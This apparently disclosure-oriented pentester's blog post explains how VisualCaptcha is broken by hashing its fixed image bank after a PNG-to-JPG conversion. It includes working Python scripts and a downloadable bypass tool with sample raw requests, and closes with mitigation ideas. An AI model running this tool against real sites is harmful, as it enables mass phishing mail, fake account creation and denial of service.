[Tool] Breaking 100% VisualCaptcha.net solution

  • Google Plus
  • LinkedIn
  • Viadeo
Posted by: Yann C.  /   Category: Programming & Development / Projects & tools   /   3 Comments

VisualCaptcha is a very widely used solution through the Internet to protect against automated robots and scripts. This solution, however, can be challenged with a 100% success rate as detailed by the present article.

tl;dr : Breaking 100% VisualCaptcha.net with GitHub scripts available here [Demonstration video].


Quick introduction to CAPTCHAs

Captcha (Completely Automated Public Turing test to tell Computers and Humans Apart) is a very popular mechanism attached to “security through obscurity” to protect against bots and attacks by automated scripts. The idea is to ensure that the processing performed by a user is done by a “human” and not by a program (Turing test).

Concretely, in the web world, captchas can protect the submission of forms, including:

  • contact forms, email submission, to prevent a script / robot automates sending thousands of emails.
  • Registration forms to newsletters, forums and other CMS, always with the objective of avoiding massive account creation via a malicious robot.
  • password change forms, profile modification or change an email address, then they act as anti-CSRF protection if properly implemented.

Captchas integrate additional control which the user (customer) must meet. The answer is subsequently verified server side (session) and valid or invalid form submission.

Many forms of captchas exist, the most commonly used are :

Dynamical captchas

Captcha dynamic

Captcha dynamic

In the form of dynamically generated images (GD2), letters, numbers and sometimes symbols are visible on these captchas. “Noise” is added to the image, randomly, to prevent the automation of deciphering them via image analysis libraries like OCR.

Image distortion, noise, pixelation, random background, these techniques also apply to sound clips with noise, robotic voices, etc; more suitable for people visually deficient.

These captchas are the most common but least appreciated by people… Image analysis libraries (OCR) are becoming more efficient to break these captchas and to counter these tools, the complexity of captchas including noise altering the image is intensified to remain robust, while making the decoding task to the end user drastically more difficult …


Captcha questions

Captcha questions

These captchas, as images, text or sound, ask a question, an enigma, a formula or a problem to the user that only a human (theoretically) can answer. Note the captchas mathematical calculations (audio / image) or the mini games as puzzle.


Visual captchas

Captcha visual

Captcha visual

This form of captcha more recent reconciles many users with this security mechanism for its simplicity. The idea is to observe a series of images, and choose the image adapted to the specified word. Eg “click on the glasses”, or “what images show horses.” These captchas are most popular for their ease of access to the new touch devices like smartphone or tablet, where you just “touch” an image and not to rewrite a sequence of characters.

The solution “VisualCaptcha” detailed in the article is included in this category.

Behavioral captchas

Captcha comportemental

Captcha comportemental

This category is young. Very few solutions exist (in particular open-source). But it nevertheless remains particularly robust if properly implemented. The new version of “reCAPTCHA“, designed by Google, fully illustrates this principle.

The captcha is enabled by a simple “click” in a box (checkbox). After that click, analysis of user behavior ensues before validating or not the captcha. Mouse movement, entropy, features of the browser, screen resolution, referer, user-agent, all these parameters allow finely identify a user as a “human” versus a “robot”.

Captchas therefore provide the “security through obscurity” (much discussed security practice), but they also allow:

  • strengthen protections against CSRF attacks;
  • to avoid the task of automation by robots or script;
  • to act as a second factor authentication, wherein the factor involved here is the “human” factor or “robot”.


VisualCaptcha is an open-source reference solution for the development of simple visual captchas through a multitude of technologies. Provided by visualcaptcha.net supported by emotionLoop and Clevertech, this solution is available (and supported) in PHP, Angulars.JS, JQuery, NodeJS, VanillaJS, Ruby, Django, Python, backend and frontend side, but also scope (non- officially) on ASP.NET, Java, Laravel, CakePHP, SailsJS, Grails, Meteor, etc. Some famous CMS integrate it as plugins, like WordPress. (See VisualCaptcha GitHub)

In other words, this captcha solution easily interfaces with all types of projects and attracted more than one developer and users for its ease of use via the touch devices.

VisualCaptcha features

VisualCaptcha features

VisualCaptcha was partially broken in the past (August 14, 2013, version <4.2.0), but the success rate was not 100%. Rebelote in 2014 and 2015. But none of these techniques provided a generic script, adaptable and configurable, compatible with any proxy like Burp. In addition, these solutions were based on the analysis via OCR or using image analysis libraries, and thus turn out to be slower than what I propose.

To list “some websites” that use VisualCaptcha, do the following search in Google (with the quotes):

"Type below-the answer to what you hear"

Note: in this article, only the “breaking” of images mechanism is presented. Maybe the method via the audio will follow 😉 !

VisualCaptcha analysis


Most implementations of VisualCaptcha, whatever the technology (PHP, Java, etc.), show the same operating principle. To illustrate this article, the official demo page for the latest version of VisualCaptcha will be the “target” (demo.visualcaptcha.net).

VisualCaptcha demo page

VisualCaptcha demo page

Once a page of a website is reached and is equipped with “VisualCaptcha” solution, a JavaScript code in the page load the captcha. This loading in the DOM generates an asynchronous request (AJAX) to a URL (endpoint) which is by default “/start”:

VisualCaptcha AJAX call /start

VisualCaptcha AJAX call /start

Endpoint /start

This call to “/start” has parameters:

  • /start: the initialization entry point of the captcha (endpoint)
  • 5: the number of random images to be displayed to the user. If this value is set to 1 (for display only one choice), VisualCaptcha displayed by default a minimum security of 4 pictures (2 in previous versions). If this value is set to “10000” for example, all possible images from the image library will be displayed: 37 default in the base image bank of VisualCaptcha.
  • ?r=XXXXXXXXXXXX: GET “r” parameter acts as a “unique session key” for the current captcha (12 characters lower-alpha-numeric). This is a random string (nonce) stored in server-side session, which will allow the browser to load the right images (PNG) by reusing the same value.

This call AJAX “/start/5?r=XXXXXXXXXXXX” returns JSON which is interpreted by the DOM to generate the current visual captcha. Example of JSON returned:


JSON details:

  • values: list of 5 random values (because of the “/start/5“) corresponding in order to a unique code to each 5 images that will appear as choice in the user’s browser.
  • imageName: the text label of the image to choose from, such as “tree”, “leaf”, “car” or “glasses”.
  • imageFieldName: name attribute of the hidden input type that will store the value of the image selected by the user. This field name is random between each display.
  • audioFieldName: name attribute of the hidden input type that will store the value derived from the audio extracted by the user (if the “audio” mode is chosen rather than “image”. Field name is random between each display.

Let’s play a little with “/start”, ask it to show only a single image (thus automatically captcha solution, right?):




Ah. Although requested a single image using the “1” still was a “values” list of 4 values. This protection is inherent to VisualCaptcha. Older versions allowed to display only 2 minimum (therefore one chance in two).

Trying to display 10000 values:




We do not have 10000 values but only 37 (default maximum number of images in the image bank of VisualCaptcha).

This is the weakness of visual captchas: a library of images (and sounds) of fixed size.

With the same parameter “?r=XXXXXXXXXXXX” between the same two calls to “/start”, the results returned for “values” or even other fields are constantly random and unique.

HTML/DOM source code…

On the HTML source code side, the source returned by the call to the page protected by CAPTCHA is itself uses JavaScript scripts to initialize the captcha in the DOM. By consulting the DOM can be observed that the value JSON “imageName” (the picture label to click) is reflected and displayed:

VisualCaptcha source code 01

VisualCaptcha source code 01

In addition, the value of the random string “?r=XXXXXXXXXXXX” used during initialization of the captcha by AJAX “/start” is used again to retrieve each image to display “/image/0?r= XXXXXXXXXXXX” until to “/image/4?r=XXXXXXXXXXXX” (or “5” images because “/start/5”).

The random name of the hidden text field that contains the value of the clicked image is also present:

VisualCaptcha source code 02

VisualCaptcha source code 02

When you click on the first image displayed (/image/0), is the first JSON value of “values” that is injected into the hidden field result.

VisualCaptcha source code 03

VisualCaptcha source code 03

When you click on the last image (/image/4), this is the last JSON value of “values” that is injected into the hidden field result. The values “values” of JSON are ordered in the same way as the index of display each image.

VisualCaptcha source code 04

VisualCaptcha source code 04

Form submission and POST data

If one submits the form, it has our hidden field whose name is the value of “imageFieldName” with value POST that of the corresponding image in “values”:

POST /try HTTP/1.1
Host: demo.visualcaptcha.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,en;q=0.8,fr_fr;q=0.5,en_us;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://demo.visualcaptcha.net/
Cookie: PHPSESSID=mit7fi867tj8lf0iiq24o4htk3
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52


Obviously, this POST data capture is specific to VisualCaptcha demonstration portal. On other sites with VisualCaptcha, transmission validation captcha may be different (GET, POST multipart / form-data, etc.).

In the case of the demo page of VisualCaptcha, if the captcha submitted POST to the endpoint “/try” is valid or invalid, then a 302 redirect is made to:

  • Location: /?status=failedImage (invalid captcha checked on server side by the “/try”)?
    Location: /?status=validImage (valid captcha checked on server side by the “/try”)?
VisualCaptcha demo results

VisualCaptcha demo results

Mini Analysis Summary

In summary :

  • When a protected page VisualCaptcha is displayed in a browser, an AJAX call is made on “/start/NUMBER?r=XXXXXXXXXXXX” with “NUMBER” at least 4 to 37 by default and XXXXXXXXXXXX a lower-alpha-numeric random unique string stored in session.
  • If we define NUMBER to 1 was at least 4 values returned (2 on older versions of VisualCaptcha).
  • If we define NUMBER to 10000 or more, it has the maximum number of values (ie the maximum number of unique images) returned, ie 37 by default.
  • The random string “?r=XXXXXXXXXXXX” used during the initial call “/start” is reused for each image loading PNG “/image/0?r=XXXXXXXXXXXX”, “/image/1?r=XXXXXXXXXXXX “etc.
  • The HTML field “input type hidden” name “imageFieldName” take as value than the corresponding clicked image provided in the “values”.
  • JSON field “imageName” is the text label indicating on which image is to be clicked.
  • JSON list “values” is in the same order that images are displayed.

Well, now what? With this analysis we have everything needed to automate the resolution via a script of any captcha produced by VisualCaptcha!

Breaking VisualCaptcha

Captcha me if you can !

To break any VisualCaptcha, it is necessary to perform several steps ahead. Most of these steps are automated and are quickly, however a manual task awaits …

  • Enumerate all the possibilities for text responses (automatic)
  • Collect all the image database (automatic)
  • Convert all images form PNG to JPG (automatic)
  • Create the correlation table checksum / label (manual …)
  • Go breaking every VisualCaptcha!

Enumerate all the possibilities for text responses

First step, we need to list all possible “text” answers implemented in VisualCaptcha.

If VisualCaptcha solution has been implemented on a site or application without much customization, then the images as text responses are surely those by default, ie the number 37 with labels like :

Airplane, Balloons, Camera, Car, Cat, Chair, Clip, Clock, Cloud, Computer, Envelope, Eye, Flag, Folder, Foot, Graph, House, Key, Leaf, Light Bulb, Lock, Magnifying Glass, Man, Music Note, Pants, Pencil, Printer, Robot, Scissors, Sunglasses, T-Shirt, Tag, Tree, Truck, Umbrella, Woman, World

How can we recover and check all the answers included in VisualCaptcha?

Simple, we question a lot of times the endpoint “/start” (1000 requests) to retrieve all the values of “imageName”. We put these values into an array, sort the array and delete all same value to finaly display the results.

Python script (available here) :

import requests
import json
target = "http://demo.visualcaptcha.net"
nbRequest = 1000
imagesNames = []
for i in range(0, nbRequest):
 session = requests.Session()
 response = session.get(target+"/start/1")
 data = json.loads(response.text)
sortedImagesNames = sorted(set(imagesNames))
print "[*] There are " + str(len(sortedImagesNames)) + " responses possible."
for name in sortedImagesNames:
 print name + ", ",

Example output for the demo portal (in English):

# python enum_VisualCaptcha_texts.py
[*] There are 37 responses possible.
Airplane, Balloons, Camera, Car, Cat, Chair, Clip, Clock, Cloud, Computer, Envelope, Eye, Flag, Folder, Foot, Graph, House, Key, Leaf, Light Bulb, Lock, Magnifying Glass, Man, Music Note, Pants, Pencil, Printer, Robot, Scissors, Sunglasses, T-Shirt, Tag, Tree, Truck, Umbrella, Woman, World

The set of possible answers are now in our possession (increase the number of requests to “/start” to be sure to have all possible answers).

Recover the entire image database

The other step after recovery of all possible text responses is to download the entire image database.

If the initialization of the captcha is done via the call “/start/5?r=XXXXXXXXXXXX”, then you will have 5 distinct images accessible through these URLs:

  • /image/0?r=XXXXXXXXXXXX
  • /image/1?r=XXXXXXXXXXXX
  • /image/2?r=XXXXXXXXXXXX
  • /image/3?r=XXXXXXXXXXXX
  • /image/4?r=XXXXXXXXXXXX

The image “/image/5?r=XXXXXXXXXXXX” does not exist (404) because the “/start” with the session key “XXXXXXXXXXXX” will have been initialized with “5”.

We must therefore make a request to “/start” with high image request as 10000. Or more precisely with the exact number of possible images that have been previously determined (37): “/start/37?r=XXXXXXXXXXXX “. The 37 images are recoverable via URLs:

  • /image/0?r=XXXXXXXXXXXX
  • /image/1?r=XXXXXXXXXXXX
  • […]
  • /image/35?r=XXXXXXXXXXXX
  • /image/36?r=XXXXXXXXXXXX

Small Python script to download all images in one “./imgPng” directory previously created (available here)

import requests
import json
target = "http://demo.visualcaptcha.net"
pathImgDb = "./imgPng"
session = requests.Session()
response = session.get(target+"/start/10000?r=RaNdoMsTrInG")
data = json.loads(response.text)
nbImg = len(data["values"])
print "[*] There are " + str(nbImg) + " pictures in the VisualCaptcha database of [" + target + "]"
for i in range(0, nbImg):
 imgReq = session.get(target+"/image/" + str(i) + "?r=RaNdoMsTrInG")
 if imgReq.status_code == 200:
  # Save the current PNG picture
  f = open(pathImgDb + "/" + str(i) + ".png", 'wb')
  print "[+] " + pathImgDb + "/" + str(i) + ".png download"

Let’s take a look at our directory:

VisualCaptcha pictures

VisualCaptcha pictures

Perfect ! Time to move on!

Convert all images form PNG to JPG

Why this chapter? We have all the bank of images in PNG, so why convert them to JPG?

The reason is very simple. April 30, 2014, a “major” changes VisualCaptcha emerged. This is discussed on this topic. The developers of the solution have added extra random bytes (1 to 50) in the pictures whenever they are displayed (for example “the printer”). In other words, all previously downloaded image library is not comparable to any other library of images downloaded again in another folder.

“Compare to what?”

The idea is to calculate the checksum (md5sum) of each “same” PNG image (always the example of the printer), and due to the addition of this random byte (s) influencing the size of each image, these checksums are all different …

Example of the printer image recovered 3 times (printer1.png, printer2.png and printer3.png) after multiple page refreshing:

# md5sum printer*.png
e31dead53ece8c2df18cac7518f6b89a  printer1.png
086676587e026e3e7c8f86831657c0c8  printer2.png
fbee80e758f9c3f97f0937ae57376a25  printer3.png

Although these 3 images visually represent identically the same printer, size (files) will vary slightly because of random bytes added by VisualCaptcha … So the comparison with “checksum” is not possible with PNG. ..

This new VisualCaptcha protection technique only appeared following this topic (source code here). Older versions do not apply these changes, and therefore each “checksum” returning the same value.

 // Create a hex string from random bytes
 private function utilRandomHex( $count ) {
 return bin2hex( openssl_random_pseudo_bytes( $count ) );

To work around this protection, the idea is to convert each PNG to JPG!

The conversion to JPG will change the image size (in bytes, not px), delete unnecessary data and reproduce a fully valid JPG file. Certainly the images will lose their transparency and quality but this is not important to break captchas 🙂

Python script PNG2JPG:

import Image
im = Image.open("printer1.png")
im.save("printer1.jpg", "JPEG")
im = Image.open("printer2.png")
im.save("printer2.jpg", "JPEG")
im = Image.open("printer3.png")
im.save("printer3.jpg", "JPEG")

CheckSums results:

4b6b62f3be8168abba5ad105eb086fb9  printer1.jpg
4b6b62f3be8168abba5ad105eb086fb9  printer2.jpg
4b6b62f3be8168abba5ad105eb086fb9  printer3.jpg

This is good! JPEG checksums are identical in our 3 different images in PNG yet!
Convert all images in the folder “./imgPng” to “./imgJpg” (script available here)

import Image
from os import listdir
from os.path import isfile, join
imgPngDir = "./imgPng"
imgJpgDir = "./imgJpg"
imgPngFiles = [f for f in listdir(imgPngDir) if isfile(join(imgPngDir, f))]
for img in imgPngFiles:
 if img.endswith(".png"):
  im = Image.open(imgPngDir+"/"+img)
  im.save(imgJpgDir + "/" + img + ".jpg", "JPEG")
  print "[+] Original VisualCaptcha PNG [" + imgPngDir + "/" + img + "] converted in JPG here [" + imgJpgDir + "/" + img + ".jpg]"

Check our JPG:

VisualCaptcha pictures JPG

VisualCaptcha pictures JPG

They have lost some quality and transparency, but they are unique, distinctive and visible (with comparable checksums). That’s enough for the continuation of our operations!

Creating the correlation table checksums / labels

We have the total number of images, all images in JPG, and all the textual labels that VisualCaptcha offers. Let’s create the correspondence table (manual task, sorry…) between each checksum and text label:

# md5sum ./imgJpg/*.jpg
c17b70628392f6d696cc1b25f5fb386f ./imgJpg/0.png.jpg
c4fe178b16c681fef26860d36410aff4 ./imgJpg/10.png.jpg
0b80d90a8eae32c984481cfce01872f4 ./imgJpg/11.png.jpg
fcf9b5602694bfd0e3a97036a700affc ./imgJpg/12.png.jpg
446bf84f96960d03b4ed97ee4f60fc92 ./imgJpg/13.png.jpg
76aea7d6235509a1ce3a04d168434eb8 ./imgJpg/14.png.jpg
2a6a41f2f3b204c917fd03ee5a74cc2c ./imgJpg/15.png.jpg
8edd4f6aba641a23545e242c4d00baf1 ./imgJpg/16.png.jpg
9c4a256697476081b8eb34a05501ef2e ./imgJpg/17.png.jpg
aa7e561ebc0fba06d30f5ecdb55c0841 ./imgJpg/18.png.jpg
943f4c78b35672d6fe2d8d7c7b16c2b2 ./imgJpg/19.png.jpg
63c155f036c3a013362c527a055e258b ./imgJpg/1.png.jpg
89b833eb55b97c717d9b0d9d12788233 ./imgJpg/20.png.jpg
86666417338139368ca43a8963ebced2 ./imgJpg/21.png.jpg
72a676cfde643c841232c76f60989090 ./imgJpg/22.png.jpg
351eb8558342cdab5bd37c9aa5ed7ee0 ./imgJpg/23.png.jpg
456780afb08cdaf562af8d89497bc875 ./imgJpg/24.png.jpg
872af7339e75f6cae2313eb28aac9c44 ./imgJpg/25.png.jpg
b7ca3af8c38fa6e4f9a0cb5ed89bc493 ./imgJpg/26.png.jpg
44561c957ab6ea338bafa9d7a52d9992 ./imgJpg/27.png.jpg
4b6b62f3be8168abba5ad105eb086fb9 ./imgJpg/28.png.jpg
433cdaaf1e0ca0d8367727f7e7497c12 ./imgJpg/29.png.jpg
6b99e64fe2b18c6ec388b8080bcd9947 ./imgJpg/2.png.jpg
f5f79595f81967f383fa289e3e682c23 ./imgJpg/30.png.jpg
1d42c40b62bf899b25f1cddade543658 ./imgJpg/31.png.jpg
ecad2ea49116b86c4eea21f0cd076e62 ./imgJpg/32.png.jpg
eaa28a149864637c6d3bb7c58cdae136 ./imgJpg/33.png.jpg
287c4df92b339bdedf65cea6fc7977f9 ./imgJpg/34.png.jpg
35b1b173e847b202eedac99db3002da9 ./imgJpg/35.png.jpg
65b32b9748014155896de24c2ba4a408 ./imgJpg/36.png.jpg
93d5e02b511f42936c5d4873f6b064ea ./imgJpg/3.png.jpg
39092d7718747b6f0b01cb7282d136bc ./imgJpg/4.png.jpg
2739865da34888314752ee72ea97bf76 ./imgJpg/5.png.jpg
139da71c5ac0954f668ff1947e73245f ./imgJpg/6.png.jpg
6612e4fabfb7219ed0662d3901a50b4a ./imgJpg/7.png.jpg
0985b57fb6a40d3142534f5e2c59d7f4 ./imgJpg/8.png.jpg
17a86e0825bc56546efa762160af0d19 ./imgJpg/9.png.jpg

Script available here.

From all these checksums JPG / PNG, it is necessary to produce the dictionary (Python) below. For this you will need to consult each image and manually association with the corresponding text label:

# For newer version of VisualCaptcha 5.x, picture database with 0-50 random bytes added need to be converted from PNG to JPG for right checksum value, so there are JPG and PNG checksum in the next dict.
# Dictionary of key:value with :
# labelEN = textual solution of the captcha in english (you may change these label for your language)
# labelFR = textual solution of the captcha in french (you may change these label for your language)
# md5SumPng = checkSum of the original picture in PNG
# md5SumJpg = checkSum of the picture converted from PNG to JPG (to remove random bytes added by VisualCaptcha)
dicoImg = {}
dicoImg[0] = {"labelEN":u"Airplane", "labelFR":u"l'avion", "md5SumPng":"6244aa85ad7e02e7a46544d5deab0225", "md5SumJpg":"c4fe178b16c681fef26860d36410aff4"}
dicoImg[1] = {"labelEN":u"Balloons", "labelFR":u"le ballon", "md5SumPng":"4c3fbd0824a5f2f3c58069c0416755e7", "md5SumJpg":"c17b70628392f6d696cc1b25f5fb386f"}
dicoImg[2] = {"labelEN":u"Camera", "labelFR":u"la camera", "md5SumPng":"00ab6b7f0972d5b5d2bef888ab198929", "md5SumJpg":"fcf9b5602694bfd0e3a97036a700affc"}
dicoImg[3] = {"labelEN":u"Car", "labelFR":u"la voiture", "md5SumPng":"281398645bee48e8c78cf8f650dc830e", "md5SumJpg":"2a6a41f2f3b204c917fd03ee5a74cc2c"}
dicoImg[4] = {"labelEN":u"Cat", "labelFR":u"le chat", "md5SumPng":"e3f67527bdff4b14a8297bb61e6b3c6a", "md5SumJpg":"89b833eb55b97c717d9b0d9d12788233"}
dicoImg[5] = {"labelEN":u"Chair", "labelFR":u"la chaise", "md5SumPng":"6a385164d1f36e6c2e137c1fc11569bc", "md5SumJpg":"456780afb08cdaf562af8d89497bc875"}
dicoImg[6] = {"labelEN":u"Clip", "labelFR":u"le trombone", "md5SumPng":"99be7138303ce797139a56c78e1b0143", "md5SumJpg":"aa7e561ebc0fba06d30f5ecdb55c0841"}
dicoImg[7] = {"labelEN":u"Clock", "labelFR":u"l'horloge", "md5SumPng":"4039b8c0aa05f2c35402da5842e2a37c", "md5SumJpg":"6612e4fabfb7219ed0662d3901a50b4a"}
dicoImg[8] = {"labelEN":u"Cloud", "labelFR":u"le nuage", "md5SumPng":"f25649f668fcc7ac37272ed5b6297087", "md5SumJpg":"76aea7d6235509a1ce3a04d168434eb8"}
dicoImg[9] = {"labelEN":u"Computer", "labelFR":u"l'ordinateur", "md5SumPng":"a4672d1d019615d061e40ee2c93ee625", "md5SumJpg":"943f4c78b35672d6fe2d8d7c7b16c2b2"}

Our dictionary is ready (see this script)! Just go to cracking / breaking VisualCaptcha.

Breaking captchas !

How the process will be done? You have a form (sending mail, registration, password reset, etc.) protected with VisualCaptcha. You collected all the labels, all images converted into JPG, and created the lookup table.

Now, you have to produce the form submission POST request (in the example, that of “demo.visualcaptcha.net”) with the correct POST variable name and good POST value.

Well, the last script presented here will automate this. The idea will be to:

  1. To query “/start” with a small number (to have less choice of images possible) and keep all JSON parameters, including “imageName”, “values” and “imageFieldName”.
  2. Download (always automatically via script) PNG images (4 or 2 depending on your version of VisualCaptcha) associated with the “current session captcha”.
  3. Convert each image downloaded in JPG (in memory, files not created locally)
  4. Calculate the MD5 checksum of each PNG images and those converted to JPG
  5. Search in the dictionary of key-value each md5sum of 4 images
  6. Compare these values from the dictionary with “imageName”
  7. If a value matches, then submit the form with POST for validating the captcha imageFieldName = values [N] where N is the corresponding picture!

We put all this in a script, and test directly on the demo portal “demo.visualcaptcha.net”. As a reminder, according to the captcha submited, the “/try” endpoint makes a 302 redirect to:

  • Location: /?status=failedImage (invalid captcha checked on server side)
  • Location: /?status=validImage (valid captcha checked on server side))

To make this script VisualCaptchaBreaker as possible generic, the idea was to pass an HTTP request in raw format in the script input, changing the field that the script should automatically replaced with the values of captcha broken.

So (via Burp for example), record the final query in a text file and change the name / value captcha by the variables “%VISUALCAPTCHANAME%” and “%VISUALCAPTCHAVALUE%”:

POST /try HTTP/1.1
Host: demo.visualcaptcha.net
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://demo.visualcaptcha.net/
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52


This example use standard POST data, another example with POST multipart/form-data is here.

Download the latest VisualCaptchaBreaker, and run the script:

[ Download Script Python final VisualCaptchaBreaker-latest.py ]

$ python VisualCaptchaBreaker-latest.py -h

 __      ___                 _  _____            _       _
 \ \    / (_)               | |/ ____|          | |     | |
  \ \  / / _ ___ _   _  __ _| | |     __ _ _ __ | |_ ___| |__   __ _
   \ \/ / | / __| | | |/ _` | | |    / _` | '_ \| __/ __| '_ \ / _` |
    \  /  | \__ \ |_| | (_| | | |___| (_| | |_) | || (__| | | | (_| |
     \/   |_|___/\__,_|\__,_|_|\_____\__,_| .__/ \__\___|_| |_|\__,_|
               |  _ \               | |   | |
               | |_) |_ __ ___  __ _| | __|_| _ __
               |  _ <| '__/ _ \/ _` | |/ / _ \ '__|
               | |_) | | |  __/ (_| |   <  __/ |
               |____/|_|  \___|\__,_|_|\_\___|_|

Title:                  VisualCaptchaBreaker.py  Version: 1.0.0
Author:                 Yann CAM
Website:                www.asafety.fr
Source:                 github.com/yanncam/VisualCaptchaBreaker
Description:            Breaking any VisualCaptcha 5.x with 100% success rate

usage: VisualCaptchaBreaker-latest.py [OPTIONS]

Breaking any VisualCaptcha 5.x with 100% success rate :
        eg: python VisualCaptchaBreaker-latest.py -f TARGET_REQUEST.txt
        eg: python VisualCaptchaBreaker-latest.py -d TARGET_DIRECTORY
        eg: python VisualCaptchaBreaker-latest.py -f TARGET_REQUEST.txt -p "" -n 10
        eg: python VisualCaptchaBreaker-latest.py -f TARGET_REQUEST.txt -s "/visualCaptcha-PHP/public/start" -i "/visualCaptcha-PHP/public/image" -n 10 -c -v --https

TARGET_REQUEST.txt sample raw request file (to demo.visualcaptcha.net) :
        POST /try HTTP/1.1
        Host: demo.visualcaptcha.net
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
        Referer: http://demo.visualcaptcha.net/
        Cookie: PHPSESSID=MyFaKeSeSsIoNiD
        Content-Type: application/x-www-form-urlencoded
        Content-Length: 52


optional arguments:
  -h, --help            show this help message and exit
  -n NUMBER, --number NUMBER
                        Number of request(s) to make (default: 1)
                        VisualCaptcha initialization path (default: /start)
                        VisualCaptcha image path (default: /image)
  -c, --cookie          Use cookie defined in raw HTTP file(s)
  -f FILES [FILES ...], --files FILES [FILES ...]
                        Files containing raw HTTP requests with %VISUALCAPTCHANAME% and %VISUALCAPTCHAVALUE% as POST param
  -d DIRECTORY, --directory DIRECTORY
                        Directory containing raw HTTP requests in files with %VISUALCAPTCHANAME% and %VISUALCAPTCHAVALUE% as POST param
  -p PROXY, --proxy PROXY
                        HTTP Proxy to send requests via. (Burp eg:
  --https               Use HTTPS
  -v, --verbose         Debug logging

An example of running 10 queries with 100% breaking success of VisualCaptcha on the demo portal, video:

Bingo! “status=validImage” for each test ! (Tested with more than 10 000 requests with 100% success).


It was during one of my pentest missions that I test VisualCaptcha. This one was built natively default captcha solution in a known and widely used CMS.

By digging a little into this captcha solution that says “never broken by a bot (as far we know)” I pushed the analysis to the production of this present article and the creation of a tool with 100% success rate.

The VisualCaptcha on which I fought was obsolete (old version before 2014), and the safety of 1 to 50 random bytes added to the images was not present … A first version of the script was therefore based on checkSum PNG without going through a conversion to JPG.

Only after being interested in the latest VisualCaptcha, particularly through the demo portal, the idea of converting JPG to bypass this protection has been implemented successfully.

VisualCaptcha is a great solution (though breakable). But after all, when a captcha uses a fixed size of knowledge base, the solution is considered to be non-secure.

This is one of the few simple solutions to implement, compatible with a multitude of technologies, fully open-source, beautiful and easy to use (it must be said!) while being particularly suitable for touchscreen terminals.

How to improve the security in this case? Several ideas:

  • Add “behavioral” controls like Google “reCAPTCHA” in the validation process
  • Improve the mechanics of making random images with 1 to 50 bytes added, changing pixels such that even when converting JPG checksums differ.
    • Certainly OCR solutions can still get around, but the scripting task will be even more complex for a potential attacker.
    • There are also alternatives to outright checksum, as pHash that the solution will thwart.
  • If the images have a random bytes to every load (to avoid checksum), think about doing the same for the audio (which seems to be the case, to experience!)
  • To limit the number of mass submission of protected forms via VisualCaptcha, it would be interesting to add a minimum time a user must wait between initialization captcha (AJAX call “/start”) and the final submission form. Indeed, for a contact form for example, the user will take at least a few seconds to fill out all fields and select the right captcha, so add this security natively.

A issue was opened on the official GitHub of VisualCaptcha to present these ideas and demonstration.

For the initial pentest I was leading this “breaking VisualCaptcha” helped develop scripts / PoC illustrative of attack scenarios:

  • Sending mass emails fraudulent, with phishing attempt
  • Creating thousands / millions of user accounts to saturate a database
  • Upload a multitude of files to saturate the server-side disk space and cause a denial of service (DoS)
  • Etc.

All these targets forms were initially protected via VisualCaptcha.

For the future, when I get some time, I’ll dig the “audio” side of the solution …

I wanted to thank Bruno Bernardino, one of the main developers of VisualCaptcha and initiator of the project, for his kindness and his interest about the discussions we have had on GitHub.

Sources & resources

  • Google Plus
  • LinkedIn
  • Viadeo
Author Avatar

About the Author : Yann C.

Consultant en sécurité informatique et s’exerçant dans ce domaine depuis le début des années 2000 en autodidacte par passion, plaisir et perspectives, il maintient le portail ASafety pour présenter des articles, des projets personnels, des recherches et développements, ainsi que des « advisory » de vulnérabilités décelées notamment au cours de pentest.